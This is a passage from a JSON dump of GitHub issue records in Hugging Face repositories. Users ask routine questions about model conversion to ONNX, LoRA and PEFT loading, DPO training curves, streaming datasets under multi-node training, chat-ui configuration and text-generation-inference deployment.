Question\n\nI have the following code:\r\n\r\n```\r\nconst pipe = await pipeline('embeddings');\r\n const output = await pipe([\r\n 'The quick brown fox jumps over the lazy dog',\r\n ]);\r\n const embedding = output[0][0];\r\n```\r\n\r\n`output[0][0]` causes a typescript error\uff1a\r\n\"CleanShot\r\n", "url": "https://github.com/huggingface/transformers.js/issues/557", "state": "open", "labels": [ "question" ], "created_at": "2024-02-02T04:38:20Z", "updated_at": "2024-02-08T19:01:06Z", "user": "pthieu" }, { "repo": "huggingface/diffusers", "number": 6819, "title": "How to let diffusers use local code for pipelineinstead of download it online everytime We use it?", "body": "I tried to use the instaflowpipeline from example/community to.run my test However, even after i git cloned the repository to my environment it still Keep trying to Download the latest object of the instaflow pipeline code Unfortunately in my area is hard for the environment to download it directly from rawgithub. I tried to change the downloaded code to let it just use these code already in my environment But find it hard to change the path to url.\r\n I would be appreciated if someone could find an proper answer . Thank you for your time and happy lunar new year!", "url": "https://github.com/huggingface/diffusers/issues/6819", "state": "closed", "labels": [], "created_at": "2024-02-02T02:53:48Z", "updated_at": "2024-11-28T05:44:10Z", "user": "Kevin-shihello-world" }, { "repo": "huggingface/diffusers", "number": 6817, "title": "How to use class_labels in the Unet2DConditionalModel or Unet2DModel when forward? ", "body": "Hi, I want to know what the shape or format of \"class\" is if I want to add the class condition to the unet? Just set the **classe_labels** 0, 1, 2, 3?\r\n\r\nUnet2DModel: **class_labels** (torch.FloatTensor, optional, defaults to None) \u2014 Optional class labels for conditioning. Their embeddings will be summed with the timestep embeddings.\r\n\r\nUnet2DConditionalModel: **class_labels** (torch.Tensor, optional, defaults to None) \u2014 Optional class labels for conditioning. Their embeddings will be summed with the timestep embeddings. timestep_cond \u2014 (torch.Tensor, optional, defaults to None): Conditional embeddings for timestep. 
If provided, the embeddings will be summed with the samples passed through the self.time_embedding layer to obtain the timestep embeddings.", "url": "https://github.com/huggingface/diffusers/issues/6817", "state": "closed", "labels": [], "created_at": "2024-02-02T02:17:40Z", "updated_at": "2024-02-07T07:31:35Z", "user": "boqian-li" }, { "repo": "huggingface/sentence-transformers", "number": 2465, "title": "How to load lora model to sentencetransformer model?", "body": "Dear UKPlab team,\r\n\r\nMy team and myself are working on a RAG project and right now we are fine tuning a retrieval model using peft library. The issue is once we have the model fine-tuned, we couldn't load the local config and checkpoints using `sentencetransformer`. \r\nHere is our hierarchy of the local path of the peft model\r\n- adapter_config.json\r\n- adapter_model.safetensors\r\n- ....\r\n\r\nWhen I look into the `sentence-transformers` package, the issue comes from the class```Transformer.py``` which doesn't consider the situation that the model path is a ```peftmodel``` path:\r\n` config = AutoConfig.from_pretrained(model_name_or_path, **model_args, cache_dir=cache_dir)`\r\nSo we have to comment this line and delete the `config` attribute at all and in the `_load_model` method, only keep this code:\r\n`self.auto_model = AutoModel.from_pretrained(model_name_or_path, cache_dir=cache_dir)`\r\n\r\nSincerely request. Could you please fix this issue or could you please tell me the correct way to load a peft model using sentencetransformer class?\r\n", "url": "https://github.com/huggingface/sentence-transformers/issues/2465", "state": "closed", "labels": [], "created_at": "2024-02-02T00:18:04Z", "updated_at": "2024-11-08T12:32:36Z", "user": "Shengyun-Si" }, { "repo": "huggingface/amused", "number": 3, "title": "How to generate multiple images?", "body": "Thank you for your amazing work! Could you kindly explain how to generate multiple images at a time? Thankyou", "url": "https://github.com/huggingface/amused/issues/3", "state": "closed", "labels": [], "created_at": "2024-02-01T18:03:30Z", "updated_at": "2024-02-02T10:36:09Z", "user": "aishu194" }, { "repo": "huggingface/alignment-handbook", "number": 110, "title": "DPO loss on different datasets", "body": "In parallel with #38, tho i am relating to full training instead of lora.\r\n\r\nWhen i use a different set of prefs (ie chosen and rejected) but still same instructions (ultrafeedback), i get extremely low eval/train loss, where it drops sharply in the beginning. In contrast to training on the original prefs as in the case of ultrafeedback_binarised. 
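(Editor's reference for the curves that follow: the standard DPO objective from Rafailov et al. The inner term, the difference of the two β-scaled log-ratios, is the "reward margin" plotted below; when chosen/rejected pairs are trivially separable, that margin grows and the sigmoid saturates, which is consistent with a sharply collapsing loss.)

```latex
\mathcal{L}_{\mathrm{DPO}}(\pi_\theta;\pi_{\mathrm{ref}})
  = -\,\mathbb{E}_{(x,\,y_w,\,y_l)\sim\mathcal{D}}\!\left[
      \log\sigma\!\Bigl(
        \beta\log\tfrac{\pi_\theta(y_w\mid x)}{\pi_{\mathrm{ref}}(y_w\mid x)}
        \;-\;
        \beta\log\tfrac{\pi_\theta(y_l\mid x)}{\pi_{\mathrm{ref}}(y_l\mid x)}
      \Bigr)\right]
```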
\r\n\r\nOn my pref dataset (Eval loss)\r\n![image](https://github.com/huggingface/alignment-handbook/assets/88869287/6794892c-b9e5-4045-b627-45024c5843e7)\r\n\r\non original pref dataset (eval loss)\r\n![image](https://github.com/huggingface/alignment-handbook/assets/88869287/539c78a9-46a1-408a-bdfc-35f8436e751f)\r\n\r\ntrain loss (mine)\r\n![image](https://github.com/huggingface/alignment-handbook/assets/88869287/216603db-30cc-477c-8198-c2365433fada)\r\n\r\noriginal\r\n![image](https://github.com/huggingface/alignment-handbook/assets/88869287/6943cc8b-0d2b-4b55-84d4-2a2465ed7537)\r\n\r\nreward margin (mine)\r\n![image](https://github.com/huggingface/alignment-handbook/assets/88869287/2c9b3f7c-ac19-4d5d-9532-6a88d3132fca)\r\n\r\noriginal reward\r\n![image](https://github.com/huggingface/alignment-handbook/assets/88869287/c8a5de1c-5f90-4709-9f1c-298ce52d697a)\r\n\r\n\r\nThis huge diff in scale seems to occur when i use pref datasets that are sampled from the reference policy instead of in the case of ultrafeedback, where it is sampled from various policies.\r\n\r\nMoreover this huge decrease in loss actually cause the DPO-ed model to perform worse across various benchmarks. Is there any intuition regarding this?", "url": "https://github.com/huggingface/alignment-handbook/issues/110", "state": "open", "labels": [], "created_at": "2024-02-01T15:49:29Z", "updated_at": "2024-02-01T15:49:29Z", "comments": 0, "user": "wj210" }, { "repo": "huggingface/chat-ui", "number": 757, "title": "Which (temperature) configurations for Zephyr chat interface?", "body": "Hi, I apologise for what is maybe an obvious question but where can I find the exact configurations for the model offered on the HF Zephyr Chat interface on https://huggingface.co/spaces/HuggingFaceH4/zephyr-chat for Zephyr 7B beta? I'm especially interested to see the temperature settings and wasn't able to find this information.", "url": "https://github.com/huggingface/chat-ui/issues/757", "state": "closed", "labels": [ "support" ], "created_at": "2024-02-01T14:27:12Z", "updated_at": "2024-02-01T14:47:13Z", "comments": 3, "user": "AylaRT" }, { "repo": "huggingface/diffusers", "number": 6804, "title": "How to only offload some parts but not whole model into cpu?", "body": "Using enable_cpu_offload() will offload the whole model into cpu, which can occupy a large part of cpu memory. How can I just offload a part of model into cpu?", "url": "https://github.com/huggingface/diffusers/issues/6804", "state": "closed", "labels": [], "created_at": "2024-02-01T07:43:04Z", "updated_at": "2024-02-02T04:59:43Z", "user": "blx0102" }, { "repo": "huggingface/transformers.js", "number": 553, "title": "How to convert BAAI/bge-m3 for Transformers.js?", "body": "### Question\n\nI tried to convert https://huggingface.co/BAAI/bge-m3 to ONNX using the instructions at https://github.com/xenova/transformers.js?tab=readme-ov-file#convert-your-models-to-onnx but I'm getting errors.\r\n\r\n```shell\r\n$ python -m scripts.convert --model_id BAAI/bge-m3\r\n\r\nFramework not specified. Using pt to export to ONNX.\r\nAutomatic task detection to feature-extraction (possible synonyms are: default, mask-generation, sentence-similarity).\r\nUsing the export variant default. 
Available variants are:\r\n\t- default: The default ONNX variant.\r\nUsing framework PyTorch: 2.0.1\r\nOverriding 1 configuration item(s)\r\n\t- use_cache -> False\r\n================ Diagnostic Run torch.onnx.export version 2.0.1 ================\r\nverbose: False, log level: Level.ERROR\r\n======================= 0 NONE 0 NOTE 0 WARNING 0 ERROR ========================\r\n\r\nSaving external data to one file...\r\nPost-processing the exported models...\r\nDeduplicating shared (tied) weights...\r\nValidating ONNX model models/BAAI/bge-m3/model.onnx...\r\n\t-[\u2713] ONNX model output names match reference model (last_hidden_state)\r\n\t- Validating ONNX Model output \"last_hidden_state\":\r\n\t\t-[\u2713] (2, 16, 1024) matches (2, 16, 1024)\r\n\t\t-[\u2713] all values close (atol: 0.0001)\r\nThe ONNX export succeeded and the exported model was saved at: models/BAAI/bge-m3\r\n```\r\n\r\n```shell\r\ncat test.js\r\n```\r\n```js\r\nimport { pipeline } from './src/transformers.js'\r\n\r\nconst extractor = await pipeline('feature-extraction', 'BAAI/bge-m3', {\r\n quantized: false,\r\n cache_dir: './models',\r\n local_files_only: true,\r\n})\r\n\r\nconst embedding = await extractor('hello there', { pooling: 'mean', normalize: true })\r\nconsole.log(JSON.stringify(Array.from(embedding.data), null, 2))\r\n```\r\n\r\n```shell\r\n2024-01-31 20:35:16.548 node[64946:11650151] 2024-01-31 20:35:16.548343 [E:onnxruntime:, inference_session.cc:1532 operator()] Exception during initialization: /Users/runner/work/1/s/onnxruntime/core/optimizer/initializer.cc:31 onnxruntime::Initializer::Initializer(const onnx::TensorProto &, const onnxruntime::Path &) !model_path.IsEmpty() was false. model_path must not be empty. Ensure that a path is provided when the model is created or loaded.\r\nError: Exception during initialization: /Users/runner/work/1/s/onnxruntime/core/optimizer/initializer.cc:31 onnxruntime::Initializer::Initializer(const onnx::TensorProto &, const onnxruntime::Path &) !model_path.IsEmpty() was false. model_path must not be empty. Ensure that a path is provided when the model is created or loaded.\r\n\r\n at new OnnxruntimeSessionHandler (***/transformers.js/node_modules/onnxruntime-node/dist/backend.js:27:92)\r\n at ***/transformers.js/node_modules/onnxruntime-node/dist/backend.js:64:29\r\n at process.processTicksAndRejections (node:internal/process/task_queues:77:11)\r\nSomething went wrong during model construction (most likely a missing operation). Using `wasm` as a fallback.\r\nAborted(Error: ENOENT: no such file or directory, open '***/transformers.js/dist/ort-wasm-simd-threaded.wasm')\r\nfailed to asynchronously prepare wasm: RuntimeError: Aborted(Error: ENOENT: no such file or directory, open '***/transformers.js/dist/ort-wasm-simd-threaded.wasm'). Build with -sASSERTIONS for more info.\r\nAborted(RuntimeError: Aborted(Error: ENOENT: no such file or directory, open '***/transformers.js/dist/ort-wasm-simd-threaded.wasm'). Build with -sASSERTIONS for more info.)\r\n***/transformers.js/node_modules/onnxruntime-web/dist/ort-web.node.js:6\r\n...\r\n...\r\n...\r\nError: no available backend found. ERR: [wasm] RuntimeError: Aborted(Error: ENOENT: no such file or directory, open '***/transformers.js/dist/ort-wasm-simd-threaded.wasm'). 
Build with -sASSERTIONS for more info.\r\n at ***/transformers.js/node_modules/onnxruntime-common/dist/ort-common.node.js:6:11822\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async m.create (***/transformers.js/node_modules/onnxruntime-common/dist/ort-common.node.js:6:11480)\r\n at async constructSession (file://***/transformers.js/src/models.js:140:16)\r\n at async Promise.all (index 1)\r\n at async XLMRobertaModel.from_pretrained (file://***/transformers.js/src/models.js:793:20)\r\n at async AutoModel.from_pretrained (file://***/transformers.js/src/models.js:5166:20)\r\n at async Promise.all (index 1)\r\n at async loadItems (file://***/transformers.js/src/pipelines.js:3116:5)\r\n at async pipeline (file://***/transformers.js/src/pipelines.js:3056:21)\r\n\r\nNode.js v20.9.0\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/553", "state": "closed", "labels": [ "question" ], "created_at": "2024-02-01T01:40:02Z", "updated_at": "2024-02-08T22:17:29Z", "user": "devfacet" }, { "repo": "huggingface/diffusers", "number": 6785, "title": "How to finetune stable diffusion img2img(like instructpix2pix or controlnet) model with only one input channel?", "body": "Hello, experts!\r\nI want to finetune stable diffusion img2img(like instructpix2pix or controlnet) model with only one input channel or greyscale image? I saw official docs says it is ok to increase the input channel from 4 to 9, but I want to know that is this ok to decrease the input channel to be one for finetuning?\r\nThanks in advance!", "url": "https://github.com/huggingface/diffusers/issues/6785", "state": "closed", "labels": [], "created_at": "2024-01-31T09:17:56Z", "updated_at": "2024-01-31T09:27:43Z", "user": "sapkun" }, { "repo": "huggingface/accelerate", "number": 2399, "title": "How to use vscode to debug the acceleration program with breakpoints? I checked a lot of information, but still didn't find a solution", "body": "How to use vscode to debug the acceleration program with breakpoints? I checked a lot of information, but still didn't find a solution\r\n![bac6887bc502257c99e34019e987bce](https://github.com/huggingface/accelerate/assets/39908586/34df89a3-cfdf-432e-93af-42586aa8be97)\r\n", "url": "https://github.com/huggingface/accelerate/issues/2399", "state": "closed", "labels": [], "created_at": "2024-01-31T09:00:32Z", "updated_at": "2024-03-10T15:05:56Z", "user": "kejia1" }, { "repo": "huggingface/datatrove", "number": 72, "title": "Tokenization in Minhash deduplication", "body": "Hi,\r\n\r\nI have noticed that the tokenization is different from those adopted by previous papers.\r\n\r\nFor example, this [paper](https://arxiv.org/abs/2107.06499) uses space tokenization, [refinedweb](https://arxiv.org/abs/2306.01116) states that they used GPT-2 tokenizer, while datatrove adopts nltk to extract n-grams.\r\n\r\nI'm wondering whether the results obtained by different tokenization methods are consistent.", "url": "https://github.com/huggingface/datatrove/issues/72", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-31T02:33:17Z", "updated_at": "2024-02-01T15:36:24Z", "user": "jordane95" }, { "repo": "huggingface/peft", "number": 1419, "title": "How to torch.jit.trace a peft model", "body": "### Feature request\r\n\r\nNeed an example of how to trace a peft model.\r\n\r\n### Motivation\r\n\r\nHi, I'm trying to deploy a Lora-finetuned llama model on Nvidia Triton server. 
For that I need to `traced_model = torch.jit.trace(model, model_input_dict, strict=False)`, however I encountered issues like `Tracing failed sanity checks! ERROR: Graphs differed across invocations!`\r\nand terminal output was like:\r\n```\r\n/python3.10/site-packages/transformers/models/llama/modeling_llama.py:598: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n if input_shape[-1] > 1:\r\n/python3.10/site-packages/bitsandbytes/autograd/_functions.py:300: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n if prod(A.shape) == 0:\r\n/python3.10/site-packages/bitsandbytes/autograd/_functions.py:322: UserWarning: MatMul8bitLt: inputs will be cast from torch.float32 to float16 during quantization\r\n warnings.warn(f\"MatMul8bitLt: inputs will be cast from {A.dtype} to float16 during quantization\")\r\n/python3.10/site-packages/bitsandbytes/functional.py:2016: TracerWarning: Converting a tensor to a Python number might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n nnz = nnz_row_ptr[-1].item()\r\n/python3.10/site-packages/bitsandbytes/functional.py:1714: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n assert prod(list(shapeA)) > 0, f'Input tensor dimensions need to be > 0: {shapeA}'\r\n/python3.10/site-packages/bitsandbytes/functional.py:1717: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n if shapeA[0] == 0 and dimsA == 2:\r\n/python3.10/site-packages/bitsandbytes/functional.py:1719: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n elif shapeA[1] == 0 and dimsA == 3:\r\n/python3.10/site-packages/bitsandbytes/functional.py:1741: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n shapeA[-1] == shapeB[-1]\r\n/python3.10/site-packages/bitsandbytes/functional.py:1826: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. 
This means that the trace might not generalize to other inputs!\r\n new_row_stats.shape[0] == row_stats.shape[0]\r\n/python3.10/site-packages/bitsandbytes/functional.py:1829: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n new_col_stats.shape[0] == col_stats.shape[0]\r\n/python3.10/site-packages/transformers/models/llama/modeling_llama.py:120: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n if seq_len > self.max_seq_len_cached:\r\n/python3.10/site-packages/transformers/models/llama/modeling_llama.py:350: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n if attn_weights.size() != (bsz, self.num_heads, q_len, kv_seq_len):\r\n/python3.10/site-packages/transformers/models/llama/modeling_llama.py:357: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python value", "url": "https://github.com/huggingface/peft/issues/1419", "state": "closed", "labels": [], "created_at": "2024-01-30T22:56:10Z", "updated_at": "2024-02-06T09:16:07Z", "user": "dcy0577" }, { "repo": "huggingface/gsplat.js", "number": 56, "title": "how to change the camera clipping - and a feature request: add rotate control", "body": "Hello and thank you for your great work!\r\n\r\nI am a coding noob but managed to use the jsfiddle example to set up a page on which I can display my splats. \r\n\r\nIs it possible to change the clipping (and other) settings for the camera? If so, where should I look??\r\n\r\nAnd for the request; never mind, I was not paying attention\r\nThanks again!!", "url": "https://github.com/huggingface/gsplat.js/issues/56", "state": "closed", "labels": [], "created_at": "2024-01-30T19:20:35Z", "updated_at": "2024-01-31T16:51:30Z", "user": "murcje" }, { "repo": "huggingface/accelerate", "number": 2395, "title": "Question: how to apply device map to a paired model", "body": "Hello everybody,\r\n\r\nI have been experimenting with Mistral models and have written a small second model to be paired with it. However, I have a machine with 2 GPUs and would like to use both. I am aware that the parallelization `accelerate` uses is based on splitting the data by batches. How can I apply the device map from the Mistral model to my small second model?\r\n\r\n## Additional information\r\nThe second model which I have written injects a signal into the Mistral model at a strategic layer. However, this is done in a way that removes the possibility of inlining as I do not want to rewrite the model. 
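One possible direction (a sketch only; `SignalInjector` and the layer index below are hypothetical stand-ins for the user's own module): when a model is loaded with `device_map="auto"`, transformers exposes the placement that accelerate computed as `hf_device_map`, which can be used to co-locate the second model with the layer it hooks into.

```python
import torch
from transformers import AutoModelForCausalLM

# Load the big model as usual; accelerate records where each submodule went.
big = AutoModelForCausalLM.from_pretrained(
    "mistralai/Mistral-7B-v0.1",  # placeholder checkpoint
    device_map="auto",
    torch_dtype=torch.float16,
)
print(big.hf_device_map)  # e.g. {"model.embed_tokens": 0, ..., "lm_head": 1}

# Place the small model on the same device as the layer it injects into,
# so no cross-GPU copies happen at the injection point.
inject_device = big.hf_device_map["model.layers.16"]  # hypothetical hook layer
injector = SignalInjector().to(inject_device)  # .to() accepts an int index or "cpu"
```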
How can I apply the same device map from the Mistral model?", "url": "https://github.com/huggingface/accelerate/issues/2395", "state": "closed", "labels": [], "created_at": "2024-01-30T19:17:52Z", "updated_at": "2024-02-01T19:18:08Z", "user": "EricLBuehler" }, { "repo": "huggingface/diffusers", "number": 6755, "title": "how to train a lora in inpainting model?", "body": "Is there a script to train Lora in SD 1.5 inpainting?\r\n\r\nIs there any script to train Lora in SD 1.5 inpainting that works?\r\n\r\ntry this\r\nhttps://github.com/huggingface/diffusers/tree/main/examples/research_projects/dreambooth_inpaint\r\nbut it gives error\r\n`RuntimeError: element 0 of tensors does not require grad and does not have a grad_fn`\r\n@thedarkzeno @patil-suraj", "url": "https://github.com/huggingface/diffusers/issues/6755", "state": "closed", "labels": [ "stale" ], "created_at": "2024-01-29T21:14:57Z", "updated_at": "2024-11-22T01:39:54Z", "user": "loboere" }, { "repo": "huggingface/optimum-benchmark", "number": 116, "title": "How to use optimum-benchmark for custom testing of my model", "body": "I am currently using Intel\u00ae Extension for Transformers to quantize a model, and I wonder if it is possible to utilize optimum-benchmark for testing the model. Alternatively, if there are other methods to load large models, could I conduct tests using optimum-benchmark after loading the model? Many thanks; this has been a real challenge for me, as I'm unsure how to properly test an optimized large-scale model.\r\n\r\n", "url": "https://github.com/huggingface/optimum-benchmark/issues/116", "state": "closed", "labels": [], "created_at": "2024-01-29T04:07:36Z", "updated_at": "2024-02-19T16:07:06Z", "user": "WCSY-YG" }, { "repo": "huggingface/chat-ui", "number": 747, "title": ".env.local config for llama-2-7b.Q4_K_S.gguf with llama.cpp server", "body": "I am using the following .env.local with llama-2-7b.Q4_K_S.gguf and llama prompt template\r\n```\r\nMODELS=`[\r\n {\r\n \"name\": \"llama-2-7b.Q4_K_S.gguf\",\r\n \"chatPromptTemplate\": \"[INST] <>\\n{{preprompt}}\\n<>\\n\\n{{#each messages}}{{#ifUser}}{{content}} [/INST] {{/ifUser}}{{#ifAssistant}}{{content}} [INST] {{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 2048,\r\n \"stop\": [\"\"]\r\n },\r\n \"endpoints\": [\r\n {\r\n \"url\": \"http://127.0.0.1:8080\",\r\n \"type\": \"llamacpp\"\r\n }\r\n ]\r\n }\r\n]`\r\n```\r\nI am trying to get this work with chat-ui and it doesn't work and chat-ui is frozen. However server is receiving request from client. \r\n\r\n\r\n\"image\"\r\n\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/747", "state": "open", "labels": [ "support" ], "created_at": "2024-01-29T00:54:19Z", "updated_at": "2024-02-22T14:54:08Z", "comments": 3, "user": "smamindl" }, { "repo": "huggingface/chat-ui", "number": 746, "title": "settings page does not reflect selected Theme", "body": "Settings page is always light/white regardless of the Theme selected (Dark or Light). \r\n\r\nIs this intentional or we just did not have time to respect the selected Theme?\r\n\r\nIf we need to fix this, how much work load do you expect? Just small change on the main settings page (settings/+layout.svelte) or do we need to change every UI piece in settings? 
I might want to fix this if this is not huge.\r\n\r\nthanks", "url": "https://github.com/huggingface/chat-ui/issues/746", "state": "open", "labels": [ "question", "front" ], "created_at": "2024-01-28T23:09:38Z", "updated_at": "2024-01-29T11:48:59Z", "user": "hungryalgo" }, { "repo": "huggingface/transformers.js", "number": 547, "title": "Text to speech generation using Xenova/mms-tts-por", "body": "### Question\n\nHi! First of all, thank you for the awesome library, it's been handy so far!\r\n\r\nI've got 2 questions regarding TTS:\r\n\r\n- I'm using the model above to create a Brazilian Portuguese spoken audio and would like to know if there are options for this model, eg.: changing the voice from male to female, and the intonation.\r\n\r\n- I discovered another model `facebook/mms-tts-por` in the compatible languages list, but I'm getting the following error: \"'Could not locate file: \"https://huggingface.co/facebook/mms-tts-por/resolve/main/tokenizer.json\".'\". Is transformer.js compatible with it?\r\n\r\nThanks in advance", "url": "https://github.com/huggingface/transformers.js/issues/547", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-28T13:51:21Z", "updated_at": "2025-01-13T22:15:35Z", "user": "Darksoulsong" }, { "repo": "huggingface/diffusers", "number": 6739, "title": "how to generate images based on the text token embedding outputted from CLIP. token_embedding module?", "body": "how to generate images based on the text token embedding outputted from CLIP. token_embedding module?", "url": "https://github.com/huggingface/diffusers/issues/6739", "state": "closed", "labels": [ "stale", "should-move-to-discussion" ], "created_at": "2024-01-28T08:51:45Z", "updated_at": "2024-11-19T09:27:00Z", "user": "FlyGreyWolf" }, { "repo": "huggingface/transformers.js", "number": 546, "title": "header is not define ", "body": "### Question\n\n![image](https://github.com/xenova/transformers.js/assets/91903346/d14b8e30-1ed1-4840-ab83-7d2fda0871a0)\r\n", "url": "https://github.com/huggingface/transformers.js/issues/546", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-28T07:59:10Z", "updated_at": "2024-01-28T09:28:27Z", "user": "BipulRahi" }, { "repo": "huggingface/datasets", "number": 6624, "title": "How to download the laion-coco dataset", "body": "The laion coco dataset is not available now. How to download it\r\n\r\nhttps://huggingface.co/datasets/laion/laion-coco", "url": "https://github.com/huggingface/datasets/issues/6624", "state": "closed", "labels": [], "created_at": "2024-01-28T03:56:05Z", "updated_at": "2024-02-06T09:43:31Z", "user": "vanpersie32" }, { "repo": "huggingface/datasets", "number": 6623, "title": "streaming datasets doesn't work properly with multi-node", "body": "### Feature request\r\n\r\nLet\u2019s say I have a dataset with 5 samples with values [1, 2, 3, 4, 5], with 2 GPUs (for DDP) and batch size of 2. This dataset is an `IterableDataset` since I am streaming it.\r\n\r\nNow I split the dataset using `split_dataset_by_node` to ensure it doesn\u2019t get repeated. 
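For reference, a minimal sketch of that setup (the dataset name is a placeholder, and the hard-coded rank/world size would normally come from the launcher):

```python
from datasets import load_dataset
from datasets.distributed import split_dataset_by_node

# Streaming dataset, so this is an IterableDataset.
ds = load_dataset("my_org/my_corpus", split="train", streaming=True)

# Each rank keeps only its own share of the stream.
ds_rank = split_dataset_by_node(ds, rank=0, world_size=2)

for example in ds_rank:
    ...  # feed into the per-rank DataLoader / training step
```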
And since it’s already split, I don’t have to use `DistributedSampler` (also they don't work with iterable datasets anyway)?\r\n\r\nBut in this case I noticed the following:\r\n\r\nFirst iteration:\r\nfirst GPU will get → [1, 2]\r\nsecond GPU will get → [3, 4]\r\n\r\nSecond iteration:\r\nfirst GPU will get → [5]\r\nsecond GPU will get → Nothing\r\n\r\nwhich actually creates an issue, since in the case of `DistributedSampler` the samples are repeated internally to ensure none of the GPUs at any iteration is missing any data for gradient sync.\r\n\r\nSo my questions are:\r\n\r\n1. Here, since splitting happens beforehand, how do we make sure each GPU gets a batch at each iteration to avoid gradient sync issues?\r\n2. Do we need to use `DistributedSampler`? If yes, how?\r\n3. In the docstrings of `split_dataset_by_node`, this is mentioned: *\"If the dataset has a number of shards that is a factor of `world_size` (i.e. if `dataset.n_shards % world_size == 0`), then the shards are evenly assigned across the nodes, which is the most optimized. Otherwise, each node keeps 1 example out of `world_size`, skipping the other examples.\"* Can you explain the last part here?\r\n4. If `dataset.n_shards % world_size != 0`, is it possible to shard the streaming dataset on the fly to avoid the case where data is missing?\r\n\r\n### Motivation\r\n\r\nStreaming datasets should work with DDP, since big LLMs require a lot of data, DDP/multi-node is mostly used to train such models, and streaming can actually help solve the data part of it.\r\n\r\n### Your contribution\r\n\r\nYes, I can help in submitting the PR once we reach a mutual understanding on how it should behave.", "url": "https://github.com/huggingface/datasets/issues/6623", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-01-27T23:46:13Z", "updated_at": "2025-12-08T12:26:20Z", "comments": 29, "user": "rohitgr7" }, { "repo": "huggingface/unity-api", "number": 23, "title": "I need to specify text or text_target in text classification", "body": "I try calling the api by huggingfaceapi.textclassification(\"some string\", response =>...) but got the error \"you need to specify text or text_target\". Where can I specify that in my unity C# code?", "url": "https://github.com/huggingface/unity-api/issues/23", "state": "open", "labels": [ "question" ], "created_at": "2024-01-27T19:24:25Z", "updated_at": "2024-01-27T19:24:25Z", "user": "helenawsu" }, { "repo": "huggingface/transformers.js", "number": 543, "title": "Converting a model to onnx using the given script is hard (fails most of the time)", "body": "### Question\r\n\r\nI have tried to use the starcoder model by bundling it using your ONNX script, but it failed with an exception.\r\n\r\nModel: https://huggingface.co/HuggingFaceH4/starchat-beta\r\nor\r\nhttps://huggingface.co/bigcode/starcoderbase\r\n\r\nlogs:\r\n```bash\r\n$ python -m scripts.convert --quantize --model_id HuggingFaceH4/starchat-beta\r\nFramework not specified. Using pt to export to ONNX.\r\nmodel-00001-of-00004.safetensors: 3%|█▏ | 346M/9.96G [03:20<1:33:01, 1.72MB/s]\r\nDownloading shards: 0%| | 0/4 [03:23\r\n\r\nOriginally posted by **tamanna-mostafa** January 24, 2024\r\n1. I fine-tuned mistral 7b model with preference data (32k).\r\n2. 
Then I ran DPO on the fine tuned model with 12k data.\r\nThis is the command I used to run docker:\r\n```\r\naccelerate launch --config_file ./accelerate_configs/ds_zero3.yaml rlhf_dpo.py \\\r\n--model_name_or_path=\"/mnt/efs/data/tammosta/files_t/output_sft_32k\" \\\r\n--output_dir=\"/mnt/efs/data/tammosta/files_t/DPO_output_mistral_32k\" \\\r\n--data_path=\"/mnt/efs/data/tammosta/files_t/DPO_data_rbs_clean_AIF.json\" \\\r\n--use_lamma2_peft_config False \\\r\n--beta 0.1 \\\r\n--optimizer_type adamw_hf \\\r\n--learning_rate 1e-6 \\\r\n--warmup_steps 50 \\\r\n--per_device_train_batch_size 1 \\\r\n--per_device_eval_batch_size 1 \\\r\n--gradient_accumulation_steps 8 \\\r\n--lora_alpha 16 \\\r\n--lora_dropout 0.05 \\\r\n--lora_r 8 \\\r\n--max_prompt_length 2048 \\\r\n--max_length 4096 \\\r\n--num_train_epochs 4 \\\r\n--logging_steps 20 \\\r\n--save_steps 100 \\\r\n--save_total_limit 8 \\\r\n--eval_steps 50 \\\r\n--gradient_checkpointing True \\\r\n--report_to \"wandb\"\r\n```\r\n3. Now, I need to run inference on the DPO model.\r\nI ran the following commands for this:\r\n ```\r\nmodel=/data/DPO_output_mistral_32k\r\nvolume=/mnt/efs/data/tammosta/files_t:/data\r\nnum_shard=8\r\n docker run --gpus all --shm-size 1g -p 172.31.8.218:80:80 -v $volume ghcr.io/huggingface/text-generation-inference:1.1.0 --model-id $model --num-shard $num_shard --max-input-length 4095 --max-total-tokens 12000\r\n\r\n```\r\n\r\nHowever, the docker failed to initialize the model with the following error:\r\n\r\n`OSError: /data/DPO_output_mistral_32k does not appear to have a file named config.json. Checkout ' https://huggingface.co//data/DPO_output_mistral_32k/None ' for available files.`\r\n\r\nDoes anyone know how to create/find the config.json file?\r\nI'll highly appreciate any help.", "url": 